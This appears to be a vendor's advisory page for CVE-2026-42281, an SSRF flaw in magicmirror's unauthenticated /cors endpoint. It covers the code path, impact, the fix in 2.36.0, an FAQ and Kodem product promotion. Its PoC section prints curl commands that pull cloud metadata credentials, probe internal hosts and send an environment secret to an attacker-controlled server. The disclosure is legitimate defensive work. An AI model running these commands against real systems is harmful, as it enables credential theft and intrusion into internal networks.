CVE-2026-42281

CVE-2026-42281 is a critical-severity server-side request forgery (SSRF) vulnerability in magicmirror (npm), affecting versions <= 2.35.0. It is fixed in 2.36.0.

Summary

An unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets.

Details

The /cors endpoint in js/server_functions.js (function cors(), lines 37-78) acts as an open HTTP proxy with no authentication and no URL validation. Any user-supplied URL is fetched server-side via fetch() and the full response is returned to the caller.

Additionally, the replaceSecretPlaceholder() function (lines 21-25) expands any **VARIABLE_NAME** pattern in the URL with the corresponding process.env value before the request is made, allowing an attacker to exfiltrate environment variables (e.g. API keys, tokens, database credentials).

Vulnerable code path:

GET /cors?url=<attacker-controlled-url>
  → replaceSecretPlaceholder(url)     // expands **ENV_VAR** → process.env.ENV_VAR
  → fetch(url)                        // no validation, no blocklist
  → response returned to attacker     // full body, status, headers

Key issues:

  • No authentication required
  • No URL validation or blocklist for private/reserved IP ranges
  • No restriction on URL scheme or destination
  • Environment variable expansion in URL before fetch

PoC

Prerequisites: a running MagicMirror² instance accessible on the network (default: http://<host>:8080).

1. Basic SSRF, access cloud metadata (AWS IMDSv1):

curl "http://<target>:8080/cors?url=http://169.254.169.254/latest/meta-data/"

If the server runs on AWS EC2 without IMDSv2 enforcement, this returns instance metadata including IAM role credentials.

2. Internal network scanning:

curl "http://<target>:8080/cors?url=http://192.168.1.1/"
curl "http://<target>:8080/cors?url=http://127.0.0.1:3000/"

The attacker can probe internal services by observing response status codes and timing.

3. Environment variable exfiltration:

curl "http://<target>:8080/cors?url=http://<attacker-server>/?leak=**SECRET_API_KEY**"

The server expands **SECRET_API_KEY** to the value of process.env.SECRET_API_KEY before making the request, sending the secret to the attacker-controlled server as a query parameter.

Impact

  • Cloud deployments (AWS/GCP/Azure): full compromise of cloud instance credentials via metadata service (169.254.169.254), potentially leading to lateral movement within the cloud account
  • Internal network access: the server becomes a proxy to scan and interact with services on internal networks that are not directly reachable by the attacker
  • Secret exfiltration: environment variables containing API keys, database credentials, or other sensitive configuration are directly readable
  • Affected users: anyone running MagicMirror² exposed to an untrusted network (including LAN). The /cors endpoint requires no authentication, so any host that can reach the MagicMirror HTTP port can exploit this vulnerability

Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside. Typical impact: access to internal metadata services, internal APIs, or cloud credentials.

CVE-2026-42281 has a CVSS score of 8.6 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (2.36.0); upgrading removes the vulnerable code path.

Affected versions

magicmirror (<= 2.35.0)

Security releases

magicmirror → 2.36.0 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade magicmirror to 2.36.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-42281? CVE-2026-42281 is a critical-severity server-side request forgery (SSRF) vulnerability in magicmirror (npm), affecting versions <= 2.35.0. It is fixed in 2.36.0. Untrusted input controls the target URL of a server-initiated request, which may reach internal services not otherwise accessible from outside.
  2. How severe is CVE-2026-42281? CVE-2026-42281 has a CVSS score of 8.6 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of magicmirror are affected by CVE-2026-42281? magicmirror (npm) versions <= 2.35.0 is affected.
  4. Is there a fix for CVE-2026-42281? Yes. CVE-2026-42281 is fixed in 2.36.0. Upgrade to this version or later.
  5. Is CVE-2026-42281 exploitable, and should I be worried? Whether CVE-2026-42281 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-42281 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-42281? Upgrade magicmirror to 2.36.0 or later.

Other vulnerabilities in magicmirror

Stop the waste.
Protect your environment with Kodem.